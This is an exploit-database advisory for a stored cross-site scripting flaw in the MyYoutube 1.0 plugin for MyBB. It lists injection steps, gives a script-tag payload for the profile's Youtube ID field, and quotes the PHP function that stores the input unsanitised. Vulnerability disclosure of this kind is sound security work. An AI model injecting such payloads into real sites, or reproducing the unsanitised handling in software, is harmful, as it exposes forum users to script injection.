MyBB MyYoutube Cross Site Scripting

2012.12.19
Credit: limb0
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: MyYoutube MyBB Stored XSS # Date: 17.12.2012 # Exploit Author: limb0 # Vendor Homepage: http://www.mybb-es.com/ # Software Link: http://mods.mybb.com/view/myyoutube # Version: 1.0 # Category:Web Security # Tested on: Linux +-----------------------------------------------------+ Stored-XSS Installation Instructions: 1.Download and Activate the Plugin 2.Go to Usercp >> Edit Profile >> Youtube ID: 3.Inject your code: "></embed></object><script>alert("Youtube XSS")</script> 4.Visit your profile and voila. Proof:http://postimage.org/image/lnnmc80rp/ +------------------------------------------------------+ Vulnerable lines: function youtube_update($ytb) { global $mybb; if(isset($mybb->input['ytb'])) { $ytb->user_update_data['ytb'] = $mybb->input['ytb']; } }

References:

http://www.mybb-es.com/
http://mods.mybb.com/view/myyoutube


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top